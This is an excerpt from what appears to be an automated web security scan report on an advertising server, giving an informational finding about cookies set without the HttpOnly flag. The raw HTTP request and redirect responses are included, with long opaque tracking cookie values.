vdDWpF9SI7YZCS5pqD4Lt4XmKza1Vu22BCIVPxRudLr4+TIbfGcJYaUFSKN70dPk/DBKCWL8lktc5EvR/4t54LIttHGsLl+i4yL9qTdiMCVNNA1RVRVPQdPiTe9zez152RomS+7zblx4JsnVu0ptrty62RkHKO9TWHgLEWEo0zESWYENo/8ZNkdwyVeBZcMn2QlPLTUlMewbcVPQ0fCUANX0vBuKWgABd1yC1zLx5SkQ1unCrS9MAW9z0N7f1i12nKhxmvVlF2mR719fXVKDWIdcpihc3oWKs9q4M6O1SqkP762OqdSbf/mfAUmIp0GFtJ9qQ5sHJB3DOw1CN8cvvhlekXD0/HSJQCAxiquT7r2mgGRtQj017jkDUu; rsiPus_0QhP="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt97xKhGoM8agCQaitfp6FA0C8r6hsCwn3LMq6VYMHBegA/Z8Ad/QVjxQ2jNsY0ZWD+qEDxiaWPrTwV87vSfczY/tW5l+pH2v6yDAOuX7qLwExVNaXzP2AMt2j6L/eVkJaL8Z3clgZfjZQfsz2Izvu3lvroVB5Qkq5knhep0fRnij2U5Rhz/Vq0pNRMfJgqDntQNUxuwMuKPi/MV/+D5eTiviMqUVLFajotuW5yMfx/XCoKPsB5uFmJ0aEeYdxcSsloefxMiWADTneb8JcFvWYtzJV7goOlW2IZx/Qe7uHD+WE8DohrAg/IzlnQvpZUk/4nt3G7S1d2+FlWbhTTptTyrmqrUJmLu9d0aNbocdAj+G6puSgbaITB3GNtmbmWvWWYkjJUdAu8bWyz1Vxk9EtoZWN3fQ4moqyebnLZSCFznuaZy3XM1MZ/6UPGDGHg0wxwW93Ub4rBq2yDHcsfYbVyvGXzLw+8b+9UUy9zqBvbciwPhJtnEN2oJ+DSWNdng4kQV2z3lppmGNciKPNvEKlkFUGDPVMAtT9lm7UtaNWxCHXgjOtDbRm+CiahJd7NZgrCqRLfB5y//J0Ufw2gwej267ae86TAzxXu2eN6qgF8dcgK67pb0uoIvBvpTfgwi1pcxvPMCci4Vi8mTRD9tCnSNVAoEbX9LWcwaPN2Q7u7zZIF0oXM2p6RhJVeuJefa0PpIftjz0TCJPHRy7zk/lxwmTTLV3ffe8wrI7wgAyuSZxJ9HAJHIAxBzEkzwZWCcYNelk2KyyMGwsgsHyGpeFNI6jLb9IUyzjd7Cykl5KXX0/7MCFYJZEI97vkjpX7jX+GTSxF6d9Kgn6FEOTsU/uJhGmj59St/BrJxgeq94hjxHaiSpeUeJhZrK/iO6EjtDgbxDO8jw3lV7nyksZqm4f+scdCX8kvHizV60UOU0QXvdGsX83/nBssHBisyFjwXrrxi+1Gcg2/RtGxPxb+aVl2g1cE4B7E+LmhICDn/O5CC+8O5HoLPPyA="; rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpn7P+Tw3jzv8rD7yvDmvWDQ0Q8aZIAiDGSo49tlyo/qaXH5wQBQZoGx8vtub+wYEktHO6BM7/uLrdNXC7XGW2RoRccmRQldIeS8HXSTpZFxLggkcDjvNYOoGY5VZbYTnh36BiBOSmypBu+2iq2QDXMLkcK2uHT/C8yL+QzA9VXQB66zprk8rmpiNuQ+aVh/A47qdJNDn8qjknSHNRViyA6Lf9VLCsOvSBW/nO5bs5zsYbyjNLDs0tlY72ojd62XiPpxCcc3uKexC5DTRnhh3dyjVxPGSKlTmvlnr9aGHKHTLVK+Pbf8ptc5PMhhlo0YzcsATzNxrLbRoT3O3q8ARpCvgM02ra6StjkCMXHMHSO08i3XfCPZLjNdRaZogP3Ujafe16GMiz7s91qA4p5CB/lHJr+0KppLU7y9WBhmEa47Ru+ljaZ072rhbhEcmxw9qqLNU/Qhz9Jcu1BKQ80Yxf197S1IJ5HEjQj4x8ot9dp6PtQCbnIte0dkNtJgvyKbqABW/4Y9BTvL9lB5N3cnK0q0eAm7RmvrQsA06FWH3VQOB9HtLNz/xTbZK7hCVXAebPf6jRXHD0nkXRlRjiWS6ey6ODk7jWoiqPWwr+x2FHdnLpzowfuBuaZPFbrr5//T+tJPg0eKuCLr3R4K6PTUqHpej1AArZPQTL6FLqPQT4jVC3KzTCEGa4CaAnHY0Zrqs3d5iDVBUqwlTDxNfC7Ga9LeLy7/TcjcspKJyoaFh/2WC0jsAA3fEz6gj7U8mHA9cZFqj1IA6CoHNofMMWxvZ1EP/MiaMCqu1NxvqRz/nXou9NXXRguDHgUMu+z/yqY7XVxJWePCdb1p/q0Ew6qECQtyV6d8GNEFQloez/xBOOBcaKVasrabhh1mQhT1NABEEl0kGwHC9WuwvD8k5Ecm2g8Ub+8b8xWwawUkMxMLByw5fcEsO9lfN6yIXoK1vxbj/pN0GepXRxh4CCs9Y7SE/BWKnzNyBxrgIJBjNX2fpVDk9Qsy0jVeGn3pOqTP3l4YuJ1ioOHQT1JoRoJIKV4KRQq6Uzfq06fBDaJQf2kAQmgasQb39TGpsoAAZ5fvxckeQEMeOXTASaI1R/+6s3NCrVMLC7QIoUNHB/pGHS/OcquP8g8+avfDQBV+QwQIEjhL6Iy4vOheGZSgcslcOuTo9uMDkQcD4TrVKgsZIcfxEvv59B9klF63vqdAxxVxWmQS/tta5XA0ec/K359cVqOUV61/1Z4ODlvwuT29lxjH3/Y2sHLLMADwAXCR12/hlj15BfplbSqflcwddB3qetl5l4Zp7Z85bCzMG3I2xqoeKfJnKV+bExcZUxDS3oaeHUpFHUs4N5ehhFRt110WtEiM3U8HX32Gj4Hp80Y48x4dEhHIyopb6KyUupuEWF0HYN10tmN/yOvbv3JznYqmx7xBf5dbh1P1aFX/I703GMAJL4bJnpHiTF000ztP6EaHxQuNUeUotUExw=="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_0QhP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_0QhP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_jPps="MLsXsqMOpihv55B02uKkL0HO5VhPzFub41aKFXpRHFKdvPVwgHpc3W11TIR9f7LUD8Z73T83DyValfM1h7J8utf6T18BDyINqjFgUEBviB6wC3AmWRNvWmnhfgaSeSZbfIrh7v64ZWvKAjggMcZyrZ6vLc5qcjwCmL/0oZDP8YqLmKgPs4HYfVYtn46L1mXZM3vmhkqnN+Y0MpSVXqd0hbyM0SkE0D5Ds/W9iWGY7E1bUBILVyFK1/4+5eQfTiEqVlK8a/qM623WsUprwKcRuTC/2etNmMwZUmXLXL4l5tca9Cn0O15iV7KhtDVxnKAQe5YNpUihiZDCPMDCjBAivzUCewOSemVObPoFVOCM+QRn3bFQM5K42ApulVa4YVkXmSEi2rxaZ0AcwbltnrcFCac35jMSgd1X7kaUp4yDfxGV0/R+mLVaE46FkFB1KTnpLFkdV/tmPy4KErU5U7EhTepv7vNH9qtg2M0xH+DdG+tn8ISmbZbHOkanvNyNORkG0QUm2xiMICao0BBWZFo29FuH7dr0oO+iPBWl6DT2bXtmllqG9tO/p8j3jGuVtEgbIz3AlFWF2m7taYagUkBA3j1GrLDNohKBnyu5uUyPqBkfixqcpoKir0d2SBMj/OM4rORxiB7Uo65PjewHtKukTWTmQSsLj3Acbifsgi9wbL9zVVJGVgIcTXgoG/jqS05yhmfmKX8qCC0CYRRR177I88ywSaF/r7vWGjXiHHwgZ47gJ3DOQoL+DikEX0gGF3xIo8a3i2sMLQZqr2JWFzHyCCJzJmgRdhU3AEqEsSjelRGLyl/ooetx8tRA3NaApDAXyoWqc0A3eKQcLroe29E7oHp1C3oFrGgueanXYuyosXNnC+zOt62UwZW1dW3ykOxkph1oSo3iii/Lo/oUqcOQoR4Nz/dQODQww9cCLwiSYZzCMlFy0yoDyptVJ/MC31DDwF9TyHRraYHFjeiyR8N/quDWNiW56K5qS0X8vyfqZr4bgRSRGGDsiel1pymr8ak2dHW/7pgCh2Z/bNJb+FRWMW2s+CMnhwaIGgWvV6YbMPlgl9YohbQyhh/b2JbZAvwaQIxESblZqlOfGdoxG9kGmC3uUwSr"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMlIz9DOAYU1O2W4w59FbognrBvtURlrGeqPrw1kUWtYjd1uFDOZEIsCPLKkgHrmZwPR6snD/KegWZuh0FutTbw4F4xDSARkVDg/8IGrnCXyIubmHi7UglSELqYaAldXTjuMoZfdXjks77agiI8F7p4zhNhDEVuBf4g4YTRwgml0KGCNKuVDbFr44LI4RMOMXIpHjh703eskw3akIyy2OTdbNU3eH8nqE1NY09pwLwNWdkpj4QYCsaCS9peWNuRSFgNI4ESkYvqemBGYCC2pArs+myhno3ulSGalh7j4p8xdlCpnaB3m4Mg5Mw0AxlhyFHR14KBwj3liP/7CiMXvvg0420tUs8MR8cExmuoBAB3Q7hDdd95k3RQsEz5Kv9HaZfEFaJzEM7O9S1Xq2XmxGPNFRWP87+NfYBvqskp8sRzGyF3UtWzyjkPsNjmCm5h+7z0dHxie7b0c3aF5Zfw0ba7gaf9h0b68ZQq1YVnL2lSdUOX2JAKr+Lx6CtXZsqHOC7RZn2zAbkDdEwubDgzL0J5lRWYyyGPyFOlENIeVHT22U1cS2bUxO+Dyj7i90ZxfJaU+2TqDYzmo9dtyimA40OFM5XBEQ7vqEEFOzyDeCC714RzQCBRoxs/m/RS2e5ILHFPZZTEHYoZwM4ObeUmFCSiNstH9MrCk6CZJADpgFYXhjJbUAaCQQ7Yi2oMJ/D46VTxxw5eBy+yxYFS+A3EMKZJ5mxYFGg2rrBwfm05mBKjQYrQnpZfTKbqypewg9N4oxP1vCOYadfieNtqOBTLDzh0Lhd4sC3dYdv3UqPlldEEVGtnbrtbE7YsnOwCttA7ukHTH/Tt0JyRbAcJ72Egr9Nx3T22zsPrgaz+rq6BwPivgjWt9tzBx2GSlQx21WXgOMV2BOrwljqSqGvO9nJOL66/iP6Q27HdhFVcFaRzHtZUxVFvivEPBZuSLAwufljgBbQWYqnWUAtPGF7swsmufHZ2tOiNJTFvp1jvJTg3sICB0j/+CgESrkpzer1FmZ46IiuffFCkZooi4QQResLeLgwl8/ZCW60eHxyNcBv/fbUiAqZxLdJZ8sLQSsEznm1mNFopaoNZXKr6t68NrdbSN+bQ0FKULDalbcOsBsGd3oZjWwcXTussLQi+eZW9RpI0KZnhQD23eEy/9zaqlaw0o4uj3c+tdWjgy6APjlr+AjmAgDZuvsNxfLncHQqNcCbO6b4X2zHjYRg1r9QMev95WYasJ+VSxF4HkN3SyOBOeqDlNvG0CQTh3zFLBiOqhlIrL+XM32dbxI1Oe/uJ1D8sjgPDn+6+LE8esQ1NS+lYa7s8QxAqe/a7NxCrYw4wsoc/amLejCG1zImYIDwkACAl4M72NHaqS/RJ/QUhrEPjyoR344q3inOYzuxoZlHc4xLognW+QiMBxejD2/ZXYPdxsqY5WoqoXyJPxXG5nxr4vM5PMS9TkISyjXkJliU6khgFx09L7IhEVZ5dAypk5DvoKd99s6CJDr0VWN/AZdI3xlhomBupQyvW0nB+ezAypcwqmjOSv6FwLsbwrUtoE8vXOAMsuS2jylwz6UzsKJ/JTQSwUki+"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=987677&t=2
Content-Length: 0
Date: Mon, 09 May 2011 01:13:36 GMT

13.31. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=4298BE5B089CBB1E55E7A69A4E062327&rsi_site=BCE6C348CDB3347A37A6E9503B9F4896&rsi_event=3E8A9FCC69C70348C54F8308F5EEBF2B HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3006
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF5EOhMHIMN9L9XlOlhjCqMTK6hyRPhgO8/StXBMiwvUtfk2+f8pQBVnH6C1XL1Gj8ORJBPU0K18kquspNa2xO16VkbVFmPmFED/ROfss5MyaTFfhDp+yuExR1/a/IX2Hsyr1RynCW3gOqnFCbXsrgMNvCjwrXqmW2SlkxMp41EdMh9G78sGWNa/7GgZLldatK42V74Yg88W1YkZYf4F9AsRF3ZJU9DT1GHinjto6CMfbUZHldNeJBI6Flkjn2aekrtvERgpwmTyxMruLCaTR9t2E+Hj4dpKoaF4RblayFT/zAnvz2zkNwTna5rE/qk7Q+LphTnobN4Hb4fOsR4xMJVxQOqMgY5elWxPq4MbAA4pr9NcZGvV75dLPsz196Bi/xLxZb8iUPsr91zpM4TgqyjuOtnP0lITIukH4pqFfI4PAuqIffOunVFSOU+KJNu9RTMJv3MjLvRTQKWMJzx4Q+yKHmJCBbAPelw0lKw7E1yBNbQD9fS9KaCUyagBuyoH/dxaWYFEq0KJmG+9Dj0/SQE7msZCu6fHMFzfqi; rtc_M6m_=MLvntzM1ZwprJ5GrFviWjmmgATvNNHGJjojTTrWSZIpIFNkYyjZfNBHlcl0kJ6zHfageWylXbP3wSCPbUS6YYjcsKmrQeOUqyKPcaGszTDTzIh7WtzP5n4+zmZZfmgT5lRj+VfPH65chCW295PBHTclwaYvz/SFH1bidheEC6ZRKt9SG9BW8wwNKY4bJJbonQFHtMUTJpFcuSZbz7kTJnxMUL5KgBaHzjRvnrX6SnFrrchfIM5yjshfapwcb2sNQzbZdjBfasru/cAyP1weNriyPKHNATEhqm48Frl0iQ58XID97HW4ZuelkytTr1rC/Y44WWirvX1n4YT+DONi0LYUryUMomW7rJigm4wWq4rIRbkjgSHhZCCWRyQUFwJAV1ID5hI+aJ6aazd6dtbfN39bi3YdtOqXFXtQA1oZ823p8bU8+95SiLREbVMj4r9fvguEqsb6ZiowiD0QHBR5O7YoGrQTtvt49OFBNALY6xCbDvCZRxcd3PwMbMHF9NmAkKTYba8V7HuVRswXCU8FcQcP/VnsVvebZKb0EM1g01x05ERxj/PWvJb23XMUlVENuV3UxjP7/ReTP933hW1beZhIpumclGw06TmVZf/liRMOjCGGidIRNLkCjxr+jn98gJ60DuWa/6oljSYreAox5hf34+wFu4UMrGRoDMmJA7LZ+pzg7HZsRUu2MzWjCkj/8ilLGHSmlL5arTBlslp16GZkGUbdCuQOVlFSnlI9osJ7qHROvOJZhg2kYof7dNriymTDR4d+g5uaoD9DKAtFuCds/Rc7xVtfeQw4QMbnaY4JllnOKqLPOynBZckcstz/Rie4b4P4ftC2ihuu+hh+tb4xtHsHXUPc4S4kcgMoYU6nDhAG17oc8hRuW5vnXQ8mjCFlmg1AikueTXuw9zaFzxcX2n/5AY6b/9CvUk2jTwvfrs1Zd70/ybVtROyX11nYzYcRFBDcu6y63yS0FvWxXhj23zJyQBUyORdmr8TZe9HKLARFqrE0WgqHy3o4bQOGiuinjnlQO6/Tb6EQqtbqScAcGbOoTuOrGyyrrkhQRvhGP5TddNjuCbLxdI6ExyfhSWnMD5gI9RRANVnvfKpeszlgkjMhHO+AI0RAg1Rnrb694FmmSVopIgyGRfYWjkynQNgJu2WFcRVxyqXdKIg1ngWoCjEvDaqGOV5o+mwsP0WqnIOmypaPth6VviROUBdBqnTYbQpKrGdRSH3Wfsh+/t6tYtduD74mjx0Xqm2pq08w5QcKeM1WKgDKkMJ+XdzqfOAnZd82pKBjE4ORwnukNbnOu7MSSwsL9SL6E1m6fnHLOzNMuGy01wnCq/XskooIWiGeIa++XVGFfQXf7PDHd/Ucx2loESlP3R+oaCchKLj4LZFp4NtIXHvyjIXyP99iHRNx2gZf2aM8ryFP+bp9W3EenSlOtdlCd6kjeE5ZKlRwWat6Qd7j1HhdXSiPKFMAZC/MR350YkTLr27YH04gcO6l0Dkc6qJlOHZIyA2wZYJbumg0oQqkm5O5bX8SVTYKyLJBZj57fPCUUFQ==; rsiPus_nlnh="MLsXrqMOLjproBAxuuKo7xC/v0lmTlecDqSiToO8phWAnpO+YSTKFqU3TDxxVRk18Y3VCTjL0ah6bV8hWqwKPejoJrdpYW+maSaE+SE+JYHAqw/wQUT1qX7wDv68KC/ogKITsb9dC8gdu0uA7sN+LTYfo6fDEvy97fr0sfCIWg/dl5X5uzDg9KOQN8uVmwRirSVhkHVm0KyQbnTUGsc2ZQvcAhR0xzocc/zo82+gM1RCIH+HSCGErtUUZc9RJCGEmtyJa50VtG6uhU13oDsoWTBcH+pKwA+EFmS5nr9l5tca9Gn0G15id7IFw3BzD4Tvch7eJWmhiUjCLEDfLl0gbdj+ckvbdlfP3VayclAOz29lDjEAIM7evWDsxAp95So743zgvTRtdCe4oiCVigVSbNlYtf2gls9w4/Rbe+tmpqScTnQCnaNQwIizICQvruNgmFH/6+lojkVGlNDz5Ky3rTgx4Lb7FGgQFqtNmVDkIrLBzE5vX3eGdFDbFFVsTp88ZqFbUCErpL3v70oO0vaq8n4dLXBDnlJvcS6JdnjRk9xkIe69ZW1oeNhnpjXeiCaYl4LhoNHPSyKqNQcopy21Lq6Fx65Ehc1L/Zo9a+T+ilMYjIAgks58mh41keirnpuezj6yRhV7JX2rrCEqT/hJNxX7y2JcARkB1nMRRB8Zj9SHmrYZ638tSYG3b90lhgWBLXv0LDarrDfBS1eszRzd+qY471tll+fm92jvMhKTIDlOLkVopd2x+0aEKBYWNNN3k3toyRwrKsE4hBORWYMZSTdPaYPOQ1UPnovWcZpohcny7FCN8FH6hqZu6WJ0bE7KXD9+iEBSpnGNcjuJ57gNCQUER3dnilXxUU035Ub31YKYngAcRd67M4oL+VtrIgTE1ftBWaJU5hTHGEe4Nz2Zci3y3xXI6G85vV5OQZPwMjZ5we4k3N9bf3L5Db5oz9FeCksBpZVkBjxTqBRYGfoO/jdzHDYmpioDH7T49AzUBkFAhbVGacpYyYl5p0wOriiZcw3ZFQoSD4yzLpEu3nFozzx0"; rsi_us_1000000="pUMlIz9DOAYU1O2WA3Nf1wgg9Tpj7P+Tw3jzv8rD7yvDmvWDQ0Y8a5KAq8B98fA1QmRNDddtH/dK+uIMHXn850oVpZ6hBQpRqWE9VPS5Xy7XGW2RoRccmRQldIeS8HXSTpZFxGDjrLBA6xGO31q5lEKg7q/Zqa3Eh3raYFPi2iq2P/WUJ8LzKuLWOFTjNfjCk/0VNg4UoWYInFurSNSQ+aUh/C47rdGNAf1Dg1oVK6qn87HdFN4KIp8qp25VM4TSqlPz6cg1zQD2GwFFfzhKwHp0kGxTZK6jX8ZnXISB8sXcy0D55JrXRUETl0uoI4QVbKEZF/5dx1gs9ptsf6SthAIG43IlegqXwtMLrqqpTk/JyFQ2StgdP9FYuRHDpLz+OHzUQh1vrm5xKjX3+Q640exxVIfbO5itfUNxo5BZqgcjww3GikxnYg5fSYMvW08WJalwrMzbnGLl0KXXJ46jOVLE0Rb0yvlFoNktRzKMye9waAvctfzuH9EHwibUfXt190PEJ4A+Sg0AcAp7kOwVeDkiN2MCb3r1WPXuHm3y8pbsO2binEZAAOMbMCz6CtX91Rgn2EzUAx81QjGglnztOuUFRFlI7kjMQeXLGKWBRZdSe6eYTB6Lnh18LdQ5agXYqBlP5eTr0pdews3C7wuHkSy+cjD2XlZOYEMXQn9PuBTSjNA/XlMSRQqc9WomgO0U1VW9Z7NS9+gZx4/DR1GwAkIBjPHU5AlJIaaxmJASLwvjIxrX5KW3zZGf/mjfA2cFyChzAGmctIpu+Vd7ARiWWqAIi6cgvytaV2BRdBlrXFkhSMrlmfawqiVLWJ+RfqZK7gaVrut3WnrJOVMXXqr7CtxUK6a2Pn/1EfyMPFJStSe6uI0JDgJOOUXIh0/QlT3bEiUUzklRDfiLQQg9qZceXx0I0CFus/5FTGi3aSsJ/iOmQ7U7lJyS2obs9TpltQ/ufeib9k1qvREJYFLBR0z5bFhcp5yzXQbaEFx8ymNOXnS1itZUINjWC8jdy5PsuUT+JDJXPtf/HEu1N4a99erdLdqPuj+ki8RVgjGf1QVPdRYQN5Ikpkk0MRA5SSlsc87Euf+syX6f0SaGqcOA+LMY28by9BOfF4CjwojIYLQA7CTMmShGLD7QIoYNPB9pH3S/WcquP8g8yavfDQBU+QwcMOiGx/GukIS2j/H4BDvCbywCrbiyLf0IsbRg+/vZyQlnl03yTrzUhfJGYADGtKLHujYIlWVJ2juevHA9vZrI2f0zNZZFT5Ox5BJBvBcQLenCuVaRyx9ZwQYz5yUzskZStzZiHbYlVsH1sWxuxzg1xSosd3Tq17MFdy1sDZD30OeKip7ei44DiArBocEjjeNpiyKtXSdt7rrwtwl36hGrMTrfhX6+/bn0kr2hGgVBE+oKtf3pVCXZqMHah6gq1RieAs/KWLv+Kc38x5h3OOZj9/KY5a5+y4Drg4l7b9rJsCgZP8zktKSaeNFEIDZ35+CtVymuq0xkEBJifIs="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nlnh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_nlnh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5yqb="MLsXsqMOpihv55B02uKkL0HO5VhPzFub41aKFXpRHFKdvPVwgHpcSac2bwmsNhkdOEXqxvwFSW0PWuIiuf5vs4d/6+1JgnwJcXAye6BX2SmCUk2lyWHGHWX6t+hWom64sR6QCUsH8fOAPKnmos20FVMfdpaydAA0jtuMJVCZmMqvF1ncAsC7/5yE16uWBOKTCdSOSW/ZXVfhIGu3WrJm0tDqVeChoIxhy/xde4XyUmuSB9/7elAOBQRzO56McFiZihUiF7BWM4k42yn4D48KIkzxAjOp/q2matzfChpoWJoJQmAa/FD3cElkNWyDUqdAsrGcFX+B+80urqtvlG9QCLJQss7+1Vy3PpP0c1c3tnuVD8M1oK8r+GxztRVhhY3hf3DQqwdIddaV9SmdP8yl7gi/5hDgptfjDbSZhYY5FofU5WnKGlDvIflUESYvL+Jk2IV2UWopb/8BtN5P8y2PP2m6oEArr2CUij4IuY0O/HM5mblhmcw8A+Da1Pp3UByCVGdcE5Q7YvzMG11tETqmQImCxr+/d5prcM77XPpge/PPE4mwmqL0XETLf4K8AxUjzv/bE4a4Obl10/RcZE24AgjgtXJBV0AO3PwhuR7TVsydO5eFgvAU5z5QjEyTjn9OFkdeAxzU5KadN+7VcPs3TlnMKwrkOrSkBpjMGFjlL10HEg2b/LCw4KPED0fRTQrd2WP1MkhLDSPHKPlkk6C6ezxC3cSzy1t89oKC3Wk/cmt9qzfmyDU2tVei/q9pelIv1na6MUe6ek4mRDi5N1USLvECNTY2J0V7UHUKBI7/IJjSI8PbH+Xut2rj01GP1MGgOADXibtpCWQg7AdmpnXByT7seDoRNRD/KTU2tZh3v+mMMk4Lq7VCo5gwnJwZbMGxY0zeghpSZso97WZ72o+rL0/OdbUABSZYz94jFuvgOKVgyhBRNmUs4PZ6Lb+tTobehLL3sgUsZEthxCA3f50jrnKkb4zR6bpLUjdtShIAaU53tI42270YQmbrbcrr/aRPfKVSz9Vwk97mZtB92AzYIAiARXdq9cD2tzWwrPAOtLZVd0DGZy0DCYAjvwwIl1mI3sc4MAgxgCZgM7+5AZ+Tib+6kLO1TLQ="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
